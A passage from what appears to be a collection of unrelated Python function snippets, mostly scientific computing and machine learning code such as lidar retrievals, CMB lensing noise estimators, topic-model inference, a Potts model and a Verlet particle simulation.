+np.nansum(HSRL_comb-(Prof['HSRL Comb'])*np.log(HSRL_comb)) \\\n +np.nansum(WV_on-(Prof['WV Online'])*np.log(WV_on)) \\\n +np.nansum(WV_off-(Prof['WV Offline'])*np.log(WV_off)) \\\n +np.nansum(O2_on-(Prof['O2 Online'])*np.log(O2_on)) \\\n +np.nansum(O2_off-(Prof['O2 Offline'])*np.log(O2_off)) \\\n +lam[0]*np.nansum(np.abs(np.diff(np.diff(xS[:,0])))) \\\n +lam[1]*np.nansum(np.abs(np.diff(xS[:,1]))) \\\n +lam[2]*np.nansum(np.abs(np.diff(xS[:,2]))) \\\n +lam[3]*np.nansum(np.abs(np.diff(xS[:,3]))) \\\n +lam[4]*np.nansum(np.abs(np.diff(xS[:,4]))) \\\n +lam[5]*np.nansum(np.abs(np.diff(xS[:,5])))\n \n return OptError", "def Create(self, tokens):\n self.delay1 = int(tokens[DELAY1])\n self.delay2 = int(tokens[DELAY2])\n self.block = int(tokens[BLOCK])\n self.trial = int(tokens[TRIAL])\n self.practiced = tokens[PRACTICED]\n self.fixationOnset = int(tokens[FIXATION_ONSET])\n self.encodingOnset = int(tokens[ENCODING_ONSET])\n self.encodingRt = int(tokens[ENCODING_RT])\n self.executionOnset = int(tokens[EXECUTION_ONSET])\n self.executionRt = int(tokens[EXECUTION_RT])\n self.probeOnset = int(tokens[PROBE_ONSET])\n self.probeRt = int(tokens[PROBE_RT])\n self.probeAcc = int(tokens[PROBE_ACC])\n self.acc = int(tokens[PROBE_ACC])\n self.blockBegin = 0\n self.blockOffset = 0\n\n # In case of RTs that are 0s, one needs to apply\n # a correction. In particular, one needs to estimate\n # the correct duration of each phase.\n if self.encodingRt == 0:\n d = self.executionOnset - self.encodingOnset - self.delay1 - 2000\n #print \"Trial %d, EncodingRT=0, estimated as %d\" % (self.trial, d) \n self.encodingRt = d\n\n if self.executionRt == 0:\n d = self.probeOnset - self.executionOnset - self.delay2 - 1000\n #print \"Trial %d, ExecutionRT=0, estimated as %d, probe=%d, exec=%d, delay2=%d\" % (self.trial, d, self.probeOnset, self.executionOnset, self.delay2) \n self.executionRt = d\n\n # If, after the correction, we have negative RTs, that means\n # that we are dealing with aborted trials (in the newer version \n # of the Eprime script). They need to be removed.\n \n if self.executionRt <= 0 or self.encodingRt <= 0:\n print \"*** Excluding trial %d --- out of time ***\" % self.trial\n # The current probe RT belongs to the previous trial, so it must\n # be overwritten.\n self.executionRt = -1 # Override (in case only Encoding was detected)\n self.probeRt = -1 # Override\n self.probeAcc = 0\n self.acc = 0\n\n self.onsets = {'Encoding' : self.encodingOnset,\n 'Execution' : self.executionOnset,\n 'Probe' : self.probeOnset}\n\n self.rts = {'Encoding' : self.encodingRt,\n 'Execution' : self.executionRt,\n 'Probe' : self.probeRt}", "def e_step(self):\n # update VMF probabilities (Equation (3))\n logP = np.dot(self.features, self.mu.T)*self.kappa + np.log(self.pi).reshape(1,-1) # n by k\n logP_norm = logP - logsumexp(logP, axis=1).reshape(-1,1)\n self.p = np.exp(logP_norm)\n self.mllk = np.mean(logsumexp(logP, axis=1))", "def ev2vi_nrl(eV,mu):\n return 9.79e3/np.sqrt(mu)*np.sqrt(2.*eV)", "def TR_algo8(self, h):\n ve = 0\n vd = self._vd\n k = 0\n p = [0,]*self._N\n m = max(self._compact_M)\n vM = sum(self._compact_M)\n for i in range(m-1, -1, -1):\n mu = self.extract_mask(i)\n mu_norm = sum([bit_component(mu, j) for j in range(self._N)])\n mu = rotate_right(mu, vd+1)\n pi = rotate_right(ve, vd+1) & (~mu & 2**self._N-1)\n r = [bit_component(h, vM - k - (j+1)) for j in range(mu_norm)][::-1]\n r = sum( [rx*2**j for j, rx in enumerate(r)] )\n k = k + mu_norm\n w = gcr_inv(r, mu, pi)\n l = gc(w)\n l = T_inv(ve, vd, l)\n for j in range(self._N):\n p[j] |= bit_component(l, j) << i\n ve = ve ^ (rotate_left(e(w), vd+1))\n vd = (vd + d(w) + 1) % self._N\n return p", "def intf_MIDN(E):\n inputok= False\n if E.The.StackSize() >= 3: # Ensure something is here.\n checkob= E.The.StackCopyItemLast() \n if checkob.whatami == \"VAL\":\n inputok= True\n if not inputok or not inc.point_formatted_LST(E.The,2) or not inc.point_formatted_LST(E.The,3):\n print(\"Input Error: midn\")\n print(intf_MIDN.__doc__)\n return # Without doing much of anything.\n ratio= E.The.StackPop().val\n P1object= E.The.StackPop()\n #P1= map(lambda x:x.val, P1object.val) # Should now be a list of floats.\n P1= [x.val for x in P1object.val] # Should now be a list of floats.\n P0object= E.The.StackPop()\n #P0= map(lambda x:x.val, P0object.val) # Should now be a list of floats.\n P0= [x.val for x in P0object.val] # Should now be a list of floats.\n x= (P1[0]-P0[0]) * ratio + P0[0]\n y= (P1[1]-P0[1]) * ratio + P0[1]\n z= (P1[2]-P0[2]) * ratio + P0[2]\n z= objectifier.StackOB_VAL(z) # Can't be just regular Python ints.\n y= objectifier.StackOB_VAL(y)\n x= objectifier.StackOB_VAL(x)\n p= objectifier.StackOB_LST([x, y, z])\n p.names= ['x','y','z']\n E.The.StackPush(p)", "def prove_NNE() -> Proof:\n # Optional Task 6.7b", "def getEG(n,int_method,func) :\n m = np.asarray([0.5,0.6,0.7,0.8,0.9,1,1.1,1.2,1.3,1.4,1.5,2,2.5,3,3.5,4,\n 4.5,5,5.5,6,6.5,7,7.5,8,8.5,9,9.5,10])\n bes = np.asarray([0.5,0.47768,0.44879,0.39831,0.25858,0,0.15502,0.25699,\n 0.30896,0.35245,0.39119,0.51822,0.53678,0.54984,0.55847,\n 0.56395,0.57054,0.57950,0.58402,0.58765,0.59512,0.60214,\n 0.60469,0.61143,0.61789,0.62443,0.63097,0.63694])\n p = np.asarray([1,0.85417,0.94685,1.04467,2.55052,0,1.59086,\n 1.00670,0.88866,0.83763,0.81030,0.76108,0.83093,0.86863,\n 0.89233,0.90909,0.92097,0.93007,0.93735,0.94332,0.94813,\n 0.95193,0.95557,0.95864,0.96107,0.96360,0.96570,\n 0.96788])\n h0 = np.asarray([0,-0.03567,-0.04808,-0.04315,-0.01879,0,0.00041,0.00069,\n 0.00639,0.01405,0.02294,0.07814,0.13994,0.19278,0.23793,\n 0.27678,0.31039,0.33974,0.36585,0.38917,0.41003,0.42891,\n 0.44621,0.46195,0.47644,0.48982,0.50223,0.51379])\n h1 = np.asarray([0,0.26899, 0.10571,0.01763,-0.39382,0,0.15211,0.05665,\n 0.00933,-0.02791,-0.05876,-0.16720,-0.13033,-0.10455 ,\n -0.08618,-0.07208,-0.06179,-0.05369,-0.04715,-0.04176,\n -0.03742,-0.03408,-0.03081,-0.02808,-0.02599,-0.02375,\n -0.02194,-0.02004])\n h2 = np.asarray([0,-0.09016,-0.06893,-0.04971,-0.08828,0,-0.03341,\n -0.03964,-0.04456,-0.04775,-0.04984,-0.05381,-0.03570,\n -0.02476,-0.01789,-0.01333,-0.01028,-0.00812,-0.00653,\n -0.00534,-0.00444,-0.00376,-0.00319,-0.00274,-0.00238,\n -0.00207,-0.00182,-0.00160])\n h3 = np.asarray([0,0.03993,0.03363,0.02216,-0.00797,0,0.00899,0.01172,\n 0.01150,0.01026,0.00860,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n 0])\n \n if (func == True) :\n int_bes = splev(n,splrep(m, bes))\n int_p = splev(n,splrep(m, p))\n int_h0 = splev(n,splrep(m, h0))\n int_h1 = splev(n,splrep(m, h1))\n int_h2 = splev(n,splrep(m, h2))\n int_h3 = splev(n,splrep(m, h3))\n else :\n int_bes = griddata(m, bes, n, method=int_method)\n int_p = griddata(m, p, n, method=int_method)\n int_h0 = griddata(m, h0, n, method=int_method)\n int_h1 = griddata(m, h1, n, method=int_method)\n int_h2 = griddata(m, h2, n, method=int_method)\n int_h3 = griddata(m, h3, n, method=int_method)\n \n return np.asarray([int_bes,int_p,int_h0,int_h1,int_h2,int_h3])", "def N_TT_TE(self, L):\n if L>2.*min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n # integrand\n def integrand(x):\n theta = x[1]\n l1 = np.exp(x[0])\n l2 = self.l2(L, l1, theta)\n if l2<self.CMB.lMin or l2>min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n phi = self.phi(L, l1, theta)\n result = self.F_TE(l1, l2, phi)*self.CMB.ftotalTT(l1)*self.CMB.ftotalTE(l2)\n result += self.F_TE(l2, l1, -phi)*self.CMB.ftotalTE(l1)*self.CMB.ftotalTT(l2)\n result *= self.F_TT(l1, l2, phi)\n result *= l1**2\n result /= (2.*np.pi)**2\n result *= 2.\n return result\n\n # if first time, initialize integrator\n if not hasattr(self.N_TT_TE.__func__, \"integ\"):\n self.N_TT_TE.__func__.integ = vegas.Integrator([[np.log(self.CMB.lMin), np.log(min(self.CMB.lMaxT, self.CMB.lMaxP))], [0., np.pi]])\n self.N_TT_TE.integ(integrand, nitn=8, neval=1000)\n result = self.N_TT_TE.integ(integrand, nitn=1, neval=5000)\n return result.mean", "def test_inu(self):\n lmax = 3\n x = np.array([5000])\n result_i, result_k = bessel_sk.lniknu(x, lmax)\n pih = np.log(0.5*np.pi)\n expP = (1+np.exp(-2*x))\n expM = (1-np.exp(-2*x))\n expected_i = np.array([\n -np.log(2*x**1) + x + np.log(expM),\n -np.log(2*x**2) + x + np.log(expM*(x+1)+x-1),\n -np.log(2*x**3) + x + np.log((3+x**2)*expM-3*x*expP),\n -np.log(2*x**4) + x + np.log((15*x+x**3)*expP-(15+6*x**2)*expM) \n ])\n expected_k = np.array([pih -x - 1*np.log(x),\n pih -x - 2*np.log(x) + np.log(x+1),\n pih -x - 3*np.log(x) + np.log(x**2+3*x+3),\n pih -x - 4*np.log(x) + np.log(x**3+6*x**2+15*x+15)\n ])\n assert_almost_equal(result_i[0]/expected_i.T, 1, decimal=4)\n assert_almost_equal(result_k[0]/expected_k.T, 1, decimal=4)", "def TCVB0(docs, alpha, beta, epsilon=0.0001, log=no_log):\n D, V = docs.shape\n K = len(alpha)\n\n #store variational q_{z_{d,w} = t} for each d as sparse table in\n #array z\n z = np.zeros(D, dtype=object)\n\n #initialize counts\n #N[t, w] = expectaction of unnormalized phi_{k,w}\n N = np.zeros((V, K), dtype=float)\n\n #Nd[d, t] = unnormalized theta_{d,k}\n Nd = np.zeros((D, K), dtype=float)\n\n for d in xrange(D):\n #random initialization\n init = rand(docs[d].nnz * K)\n active_words = docs[d].nonzero()[1]\n ij = (np.repeat(active_words, K), np.tile(np.arange(K), len(active_words)))\n\n #z[d] is VxK sparse row matrix\n z[d] = csr_matrix((init, ij), shape=(V, K))\n\n #normalize z[d]\n z[d] = normalize(z[d], norm='l1', axis=1)\n\n #update counts\n #set_trace()\n M = diag(docs[d]).dot(z[d]).toarray()\n N += M\n Nd[d] = M.sum(axis=0) + alpha\n\n log('document %d/%d preinitialized' % (d + 1, D))\n\n #sum of array and matrix is matrix, so convertion is required\n N = np.asarray(N) + beta\n\n #Nt[t] is pre-computed unnormalized expectation topic t\n Nt = np.squeeze(np.asarray(N.sum(axis=0)))\n if type(beta) is float:\n Nt += V * beta\n elif type(beta) is np.ndarray:\n Nt += beta.sum(axis=0)\n else:\n raise 'beta must be either scalar (float) number for symmetric prior or a full matrix VxK for custom prior'\n\n #do variational updates until convergence\n iteration = 1\n while True:\n iteration_time = time()\n avg_diff = 0.0\n\n #for each document\n for d in xrange(D):\n #for each word in a document\n max_diff = 0.0\n doc_diff = 0.0\n\n doc_w = docs.data[docs.indptr[d]:docs.indptr[d + 1]]\n\n i = 0\n old_z_d = z[d].data.copy()\n #for each word in the document d\n #do variational update and estimate difference\n for w in docs.indices[docs.indptr[d]:docs.indptr[d + 1]]:\n #save old q(z_d) distribution\n old_z = z[d].data[z[d].indptr[w]:z[d].indptr[w + 1]] * doc_w[i]\n #we take expectations ignoring current document and current word\n N[w] -= old_z\n Nt[:] -= old_z\n Nd[d] -= old_z\n #update\n new_z = N[w] / Nt * Nd[d]\n #normalization\n new_z /= new_z.sum()\n #write new values back\n z[d].data[z[d].indptr[w]:z[d].indptr[w + 1]] = new_z\n #expectations update\n new_z *= doc_w[i]\n N[w] += new_z\n Nt[:] += new_z\n Nd[d] += new_z \n\n i += 1\n\n #word_diff = variational_update(d, w)\n doc_diff += np.abs(old_z_d - z[d].data)\n avg_diff += doc_diff.sum()\n max_diff = max(max_diff, doc_diff.max())\n if d % 100 == 0:\n log('document %d/%d was updated' % (d + 1, D))\n\n avg_diff /= docs.nnz * K\n log('iteration %d. avg diff: %f. max diff: %f. time: %f' % (iteration, avg_diff, max_diff, time() - iteration_time))\n\n if max_diff < epsilon:\n break\n\n iteration += 1\n\n return z", "def define_potts_helper_functions(k):\n\n @njit\n def calc_observables(X, k=k):\n \"\"\"\n Parameters\n ----------\n X : ndarray of dtype np.int64\n Dimensions (n_samples, n_spins).\n\n Returns\n -------\n ndarray\n Dimensions (n_samples, n_observables).\n \"\"\"\n\n n = X.shape[1]\n Y = np.zeros((len(X), n*k+n*(n-1)//2), dtype=np.int8)\n \n # average orientation (magnetization)\n # note that fields for the third state are often set to 0\n counter = 0\n for i in range(k):\n for j in range(n):\n Y[:,counter] = X[:,j]==i\n counter += 1\n \n # pairwise correlations\n for i in range(n-1):\n for j in range(i+1, n):\n Y[:,counter] = X[:,i]==X[:,j]\n counter += 1\n \n return Y\n\n def calc_e(X, multipliers, k=k, calc_observables=calc_observables):\n \"\"\"\n Parameters\n ----------\n X : ndarray of dtype np.int64\n Dimensions (n_samples, n_spins).\n multipliers : ndarray of dtype np.float64\n\n Returns\n -------\n ndarray\n Energies of each observable.\n \"\"\"\n\n return -calc_observables(X, k).dot(multipliers)\n\n def mch_approximation(sample, dlamda, calc_e=calc_e):\n \"\"\"Function for making MCH approximation step for Potts model.\n \n Parameters\n ----------\n sample : ndarray\n Of dimensions (n_sample, n_spins).\n dlamda : ndarray\n Change in parameters.\n \n Returns\n -------\n ndarray\n Predicted correlations.\n \"\"\"\n\n dE = calc_e(sample, dlamda)\n ZFraction = len(dE) / np.exp(logsumexp(-dE))\n predsisj = (np.exp(-dE[:,None]) / len(dE) * calc_observables(sample)).sum(0) * ZFraction \n assert not ((predsisj<0).any() or\n (predsisj>(1+1e-10)).any()),\"Predicted values are beyond limits, (%E,%E)\"%(predsisj.min(),\n predsisj.max())\n return predsisj\n\n return calc_e, calc_observables, mch_approximation", "def calibration(N,kb,T,Ekinv,V):\n lamb = np.sqrt((N-1)*3*kb*T/(Ekinv*2))\n \n if lamb < 0.9999:\n V = lamb*V\n elif lamb>1.0001:\n V = lamb*V\n \n return V", "def __init__(self):\n self.modulo = Bn.from_decimal(\n \"104274339861599109435228713715012587636997755949475388588516377743858594829526246207815488124753620113654378182611410869843692693515483841382145633329409600605358434237971173658402530546783352648106247803514459454270482848535758539851532076708790494943517894654046363923325714750480680188239471613308156143136830981518627799499285672172738874571644891075726999700275877298890101149587792836886648258733566308895110719770960720300899066897289080371563621668124216187770149740826973622700315037066876583866156345639276386510201006397141393775575135928749962477326783336184434815042335057049432193006499521591281357491659\")\n self.generator = FFElement(Bn.from_decimal(\n \"81099144573950922883933823309397903831307729923277144841334749422315595743437219371821139976270089085817737914449263008752457618988770955139245864971428025146021819160336876692205993068777078938240475549226164124952577975303221660397947822711916352061614341728562734417872584743294922245761212731150483802964283263230741041446988298186702952974697967148198190463075071628059974486966250538161512056563568090071474143434146441589514816635339916481756264419884177841781745530245175458079612447970067897693825433138760936325168807521204548329680909932742314536162869895548442852131478295912996232046258690790851591666552\"),\n self.modulo, self.order())", "def test_LM(self):\n\t\t\n\t\tprecision = 10**-8\n\t\t\t\t \n\t\tif self.n == 1:\n\t\t\t\t \n\t\t\tP_sum = sum(self.estimate_prob('', w) for w in self.vocab)\n\t\t\t\n\t\t\tassert abs(1.0 - P_sum) < precision, 'Probability mass does not sum up to one.'\n\t\t\t\t \n\t\telif self.n == 2:\n\t\t\thistories = ['the', 'in', 'at', 'blue', 'white']\n\t\t\t\t \n\t\t\tfor h in histories:\n\t\t\t\t \n\t\t\t\tP_sum = sum(self.estimate_prob(h, w) for w in self.vocab)\n\t\t\t\t\n\t\t\t\tassert abs(1.0 - P_sum) < precision, 'Probability mass does not sum up to one for history' + h\n\t\t\t\t\t \n\t\tprint('TEST SUCCESSFUL!')", "def E_Dynamic_MavkoEtAl2009(rhob,DTS,PR):\n E = (2*(rhob*1000)*((304800/DTS)**2)*(1+PR))/1000000\n return E", "def solveverlet(self,T,dt):\r\n t = 0.\r\n self.dt = dt\r\n self.n = int(T/dt)\r\n L = self.param[2]\r\n N = self.particles.size\r\n\r\n self.U = np.zeros([self.n])\r\n\r\n progress = t/T*100\r\n\r\n #JV: Here we define the number of the GxG grid that we will need to calcule the entropy, change in order to change the precision of this grid\r\n self.G = 7\r\n\r\n #JV: We create a list that will be useful for the walls submenu, that will help us in the border conditions of the wall, see in vel_verlet()\r\n self.bouncing = np.zeros(self.particles.size)\r\n\r\n if(self.param[4] == \"Subsystems\"): #JV: If we are on \"Subsystems\", we will count different the types of particles\r\n self.grid = np.zeros([self.G,self.G,2])\r\n else:\r\n self.grid = np.zeros([self.G,self.G,2]) #JV: When we are not in \"Subsystems\", we will have the same type of variable, but will only use the [:,:,0] (this is because numba has problems otherwise)\r\n\r\n self.entropy_val = 0\r\n\r\n #JV: If we are simulating the brownian simulation, we initialize the array that will keep track if the brownian particle goes through a wall\r\n if(self.param[4] == \"Brownian\"):\r\n self.wallcount = np.zeros([2])\r\n else:\r\n self.wallcount = np.zeros([2]) #JV: We have to keep both in the same type of variables, otherwise numba will have problems. So now this conditional block is quite poinless. TO-ERASE\r\n\r\n np.vectorize(lambda i: i.reset())(self.particles) #This line resets the particles to their initial position\r\n\r\n self.vel_verlet_on = True #JV: If it's true, it will compute with the velocity verlet algorithm, if it's not, it will compute with normal verlet\r\n\r\n self.Nlist = int(1*(self.particles.size)**(1/2)) #JV:This variable defines the number of close particles that will be stored in the list (go to close_particles_list() for more info)\r\n #print(self.Nlist)\r\n\r\n #X,Y,VX,VY has the trajectories of the particles with two indexes that\r\n #access time and particles, respectively\r\n self.X = np.vectorize(lambda i: i.r[0])(self.particles)\r\n self.Y = np.vectorize(lambda i: i.r[1])(self.particles)\r\n self.VX = np.vectorize(lambda i: i.v[0])(self.particles)\r\n self.VY = np.vectorize(lambda i: i.v[1])(self.particles)\r\n\r\n MX, MXT = np.meshgrid(self.X[:],self.X[:])\r\n MY, MYT = np.meshgrid(self.Y[:],self.Y[:])\r\n\r\n #JV: So dx is a nxn simetric array with 0 in the diagonal, and each position is the corresponding distance between the particles,\r\n # so the position [1,2] is the distance between partcle 1 and 2 (x1-x2), and so on\r\n dx = MXT - MX\r\n dx = dx\r\n\r\n dy = MYT - MY\r\n dy = dy\r\n\r\n r2 = np.square(dx)+np.square(dy)\r\n\r\n self.close_list = close_particles_list(r2,self.Nlist,self.particles.size,self.param[2]) #JV: we first calculate the matrix that contains in every row the indexs of the m closest particles\r\n\r\n if(self.vel_verlet_on == True):\r\n #JV: We define the variables that we will need in the velocity verlet algorithm\r\n print(\"Computing with the Velocity-Verlet algorithm\")\r\n X0 = self.X\r\n Y0 = self.Y\r\n VX0 = self.VX\r\n VY0 = self.VY\r\n\r\n X1 = self.X\r\n Y1 = self.Y\r\n VX1 = self.VX\r\n VY1 = self.VY\r\n\r\n MX, MXT = np.meshgrid(X0[:],X0[:],copy=False)\r\n MY, MYT = np.meshgrid(Y0[:],Y0[:],copy=False)\r\n dx = MXT - MX\r\n dx = dx\r\n\r\n dy = MYT - MY\r\n dy = dy\r\n\r\n r2 = np.square(dx)+np.square(dy)\r\n\r\n if(np.round((t/self.dt*dt)%0.5,1) == 0): #JV: every certain amount of steps we update the list\r\n self.close_list = close_particles_list(r2,self.Nlist,self.particles.size,self.param[2]) #JV: matrix that contains in every row the indexs of the m closest particles\r\n\r\n a0 = (1/self.m)*np.transpose(fv(X0[:],Y0[:],dx,dy,r2,t/self.dt,False,self.param[2],self.particles.size,self.U,self.dt,self.close_list,self.Nlist,self.vel_verlet_on,self.R,self.param[3],self.param[4],self.param[5],self.grid,self.G,self.wallcount,self.X2))\r\n\r\n for i in range(0, self.n):\r\n r1 = np.array([X0,Y0]) + np.array([VX0,VY0])*dt + 0.5*a0*dt**2\r\n\r\n MX, MXT = np.meshgrid(r1[0,:],r1[0,:],copy=False)\r\n MY, MYT = np.meshgrid(r1[1,:],r1[1,:],copy=False)\r\n dx = MXT - MX\r\n dx = dx\r\n\r\n dy = MYT - MY\r\n dy = dy\r\n\r\n r2 = np.square(dx)+np.square(dy)\r\n\r\n if(self.param[3] == \"Free!\"):\r\n #JV: We do this to get the actual distance in the case of the \"Free!\" simulation, in which there is no elastic collision between the particles and the boundaries\r\n dx_v2 = (np.abs(dx.copy())-1*L)\r\n r2_v2 = dx_v2**2+dy**2\r\n dx = np.where(r2 > r2_v2,dx_v2*np.sign(dx),dx)\r\n r2 = np.where(r2 > r2_v2,r2_v2,r2)\r\n dy_v2 = (np.abs(dy.copy())-1*L)\r\n r2_v2 = dx**2+dy_v2**2\r\n dy = np.where(r2 > r2_v2,dy_v2*np.sign(dy),dy)\r\n r2 = np.where(r2 > r2_v2,r2_v2,r2)\r\n r2_v2 = dx_v2**2+dy_v2**2\r\n dx = np.where(r2 > r2_v2,dx_v2*np.sign(dx),dx)\r\n dy = np.where(r2 > r2_v2,dy_v2*np.sign(dy),dy)\r\n r2 = np.where(r2 > r2_v2,r2_v2,r2)\r\n\r\n #JV: call velocityverlet to compute the next position\r\n if(np.round((t/self.dt*dt)%0.5,1) == 0): #JV: every certain amount of steps we update the list\r\n self.close_list = close_particles_list(r2,self.Nlist,self.particles.size,self.param[2]) #JV: matrix that contains in every row the indexs of the m closest particles\r\n\r\n X1,Y1,VX1,VY1,a1 = vel_verlet(t,dt,np.array([X0,Y0]),np.array([VX0,VY0]),a0,dx,dy,r2,self.close_list,self.m,self.R,L,N,self.param[3],self.param[4],self.param[7],self.param[8],self.param[9],self.U,self.Nlist,self.vel_verlet_on,self.param[5],self.grid,self.G,self.wallcount,self.X2,self.bouncing)\r\n\r\n #JV: Now we check where this particle is in a RxR grid, that will help us to calcule the entropy. We do not do this for the Brownian mode because we don't compute the entropy in that case.\r\n if(self.param[4] != \"Brownian\"):\r\n for h in range(0, N):\r\n if(self.param[4] == \"Subsystems\"):\r\n if(h < self.param[5]**2): #JV: self.param[5] stores the number of n1xn1 type 1 particles\r\n self.grid[int((X1[h]+0.495*L) / (L/self.G)), int((Y1[h]+0.495*L) / (L/self.G)),0] += 1\r\n else:\r\n self.grid[int((X1[h]+0.495*L) / (L/self.G)), int((Y1[h]+0.495*L) / (L/self.G)),1] += 1\r\n else:\r\n self.grid[int((X1[h]+0.495*L) / (L/self.G)), int((Y1[h]+0.495*L) / (L/self.G))] += 1\r\n\r\n if(self.param[4] == \"Brownian\"):\r\n if(self.wallcount[0] == 0):\r\n self.X2 = np.append(self.X2,(abs(X1[N-1]))**2)\r\n else:\r\n self.X2 = np.append(self.X2,(L*self.wallcount[0]+(X1[N-1]))**2)\r\n self.entropy = np.append(self.entropy,self.entropy_val)\r\n\r\n t += dt\r\n\r\n self.X = np.vstack((self.X,X1))\r\n self.Y = np.vstack((self.Y,Y1))\r\n self.VX = np.vstack((self.VX, VX1))\r\n self.VY = np.vstack((self.VY, VY1))\r\n a0 = a1\r\n\r\n #Redefine and repeat\r\n X0,Y0 = X1,Y1\r\n VX0,VY0 = VX1,VY1\r\n\r\n #JV: Every amount of steps of time we calculate the entropy\r\n update_entropy = 2\r\n if(i % update_entropy == 0):\r\n\r\n self.entropy_val = 0\r\n sumagrid = np.sum(self.grid)\r\n\r\n if(self.param[4] == \"Subsystems\"):\r\n sumagrid_subs = np.zeros([2])\r\n sumagrid_subs[0] = np.sum(self.grid[:,:,0]) #JV: Number of type-0 particles\r\n sumagrid_subs[1] = sumagrid - sumagrid_subs[0] #JV: Number of type-1 particles\r\n\r\n for j in range(self.G):\r\n for k in range(self.G):\r\n for l in range(2):\r\n if ((self.grid[j,k,0]+self.grid[j,k,1]) != 0):\r\n # pji = float(self.grid[j,k,l])/(update_entropy*(self.grid[j,k,0]+self.grid[j,k,1]))\r\n pji = float((self.grid[j,k,l]/(sumagrid_subs[l]/(sumagrid_subs[0]+sumagrid_subs[1])))/(update_entropy*(self.grid[j,k,0]/(sumagrid_subs[0]/(sumagrid_subs[0]+sumagrid_subs[1])))+(self.grid[j,k,1]/(sumagrid_subs[1]/(sumagrid_subs[0]+sumagrid_subs[1])))))\r\n else:\r\n pji = 0\r\n if(pji != 0):\r\n self.entropy_val += -pji*np.log(pji) #JV: We will only calculate the value when pji != 0\r\n\r\n self.entropy_val = self.entropy_val /(self.G**2)\r\n\r\n else:\r\n for j in range(self.G):\r\n for k in range(self.G):\r\n pji = float(self.grid[j,k,0])/(update_entropy*sumagrid)\r\n if(pji != 0):\r\n self.entropy_val += -pji*np.log(pji)\r\n\r\n self.entropy_val = self.entropy_val /(self.G**2)\r\n\r\n if(self.param[4] == \"Subsystems\"):\r\n self.grid = np.zeros([self.G,self.G,2])\r\n else:\r\n self.grid = np.zeros([self.G,self.G,2])\r\n\r\n #Update and show progress through console\r\n progress = t/T*100\r\n if(i%1000 == 0):\r\n print(int(progress),'% done')\r\n\r\n else:\r\n print(\"Computing with the Verlet algorithm\")\r\n\r\n #Generation of the precious position (backwards euler step)\r\n X1 = self.X\r\n Y1 = self.Y\r\n X0 = X1 - self.VX*dt\r\n Y0 = Y1 - self.VY*dt\r\n\r\n for self.i in range(0,self.n):\r\n #Call verlet to compute the next position\r\n X2,Y2 = self.verlet(t,dt,np.array([X0,Y0]),np.array([X1,Y1]))\r\n t = t + dt\r\n\r\n #Add the new positions to X,Y,VX,VY\r\n self.X = np.vstack((self.X,X2))\r\n self.Y = np.vstack((self.Y,Y2))\r\n self.VX = np.vstack((self.VX,(X2-X0)/(2*dt)))\r\n self.VY = np.vstack((self.VY,(Y2-Y0)/(2*dt)))\r\n\r\n #Redefine and repeat\r\n X0,Y0 = X1,Y1\r\n X1,Y1 = X2,Y2\r\n\r\n #Update and show progress through console\r\n progress = t/T*100\r\n if(self.i%1000 == 0):\r\n print(int(progress),'% done')\r\n\r\n #Once the computation has ended, I compute the kinetic energy,\r\n #the magnitude of the velocity V and the temperature\r\n #(see doc for temperature definition)\r\n self.KE()\r\n self.V = np.sqrt((self.VX**2 + self.VY**2))\r\n self.T = (np.sum(self.V**2,axis=1)/(self.particles.size*2 - 2))\r\n\r\n #Generation of the MB functions, you can modify the definition by\r\n #changing the linspace points\r\n vs,a = np.meshgrid(np.linspace(0,self.V.max(),100),self.T)\r\n a,ts = np.meshgrid(np.linspace(0,self.V.max(),100),self.T)\r\n self.MB = (vs/(ts)*np.exp(-vs**2/(2*ts)))\r\n\r\n #JV: If we are on the Subsystems submenu, we will calculate the temperature and the MB distribution of both types of particles\r\n if(self.param[4] == \"Subsystems\"):\r\n\r\n #JV: 1st group of particles\r\n self.V1 = np.sqrt((self.VX[:,0:(self.param[5]**2)]**2 + self.VY[:,0:(self.param[5]**2)]**2))\r\n self.T1 = (np.sum(self.V1**2,axis=1)/((self.param[5]**2)*2 - 2))\r\n\r\n vs1,a1 = np.meshgrid(np.linspace(0,self.V1.max(),100),self.T1)\r\n a1,ts1 = np.meshgrid(np.linspace(0,self.V1.max(),100),self.T1)\r\n self.MB1 = (vs1/(ts1)*np.exp(-vs1**2/(2*ts1)))\r\n\r\n #JV: 2nd group\r\n self.V2 = np.sqrt((self.VX[:,(self.param[5]**2):self.particles.size]**2 + self.VY[:,(self.param[5]**2):self.particles.size]**2))\r\n self.T2 = (np.sum(self.V2**2,axis=1)/((self.particles.size-self.param[5]**2)*2 - 2))\r\n\r\n vs2,a2 = np.meshgrid(np.linspace(0,self.V2.max(),100),self.T2)\r\n a2,ts2 = np.meshgrid(np.linspace(0,self.V2.max(),100),self.T2)\r\n self.MB2 = (vs2/(ts2)*np.exp(-vs2**2/(2*ts2)))\r\n\r\n \"\"\"Here I generate the accumulated V,T and MB using lists, the reason I use lists is because if you append two numpy arrays\r\n to an empty numpy array, they merge instead of remaining separate. You could technically use splicing to save on memory\r\n but sacrificing cpu.\"\"\"\r\n\r\n self.Vacu = []\r\n self.Tacu = []\r\n self.MBacu = []\r\n self.Vacu.append(self.V[int(self.n/2),:])\r\n self.Tacu.append(np.sum(self.V[int(self.n/2),:]**2)/(self.particles.size*2 - 2))\r\n\r\n vs = np.linspace(0,self.V.max(),100)\r\n self.MBacu.append((vs/(self.Tacu[0])*np.exp(-vs**2/(2*self.Tacu[0]))))\r\n\r\n #This delta controls the time interval for accumulation, right now its every 5 units\r\n delta = 5./dt\r\n\r\n #This 40 that appers in these lines is the time from which I start accumulating\r\n #to ensure the system has reached equilibrium.\r\n for i in range(1,int((self.n-(40./dt))/delta)):\r\n self.Vacu.append(np.hstack((self.Vacu[i-1],self.V[int(40./dt)+int(i*delta),:])))\r\n self.Tacu.append(np.sum(self.Vacu[i]**2)/(self.Vacu[i].size*2 - 2))\r\n self.MBacu.append((vs/(self.Tacu[i])*np.exp(-vs**2/(2*self.Tacu[i]))))\r\n return", "def N_TT_TB(self, L):\n if L>2.*min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n # integrand\n def integrand(x):\n theta = x[1]\n l1 = np.exp(x[0])\n l2 = self.l2(L, l1, theta)\n if l2<self.CMB.lMin or l2>min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n phi = self.phi(L, l1, theta)\n result = 0. #self.F_TB(l1, l2, phi)*self.CMB.ftotalTT(l1)*self.CMB.ftotalTB(l2)\n result += 0. #self.F_TB(l2, l1, 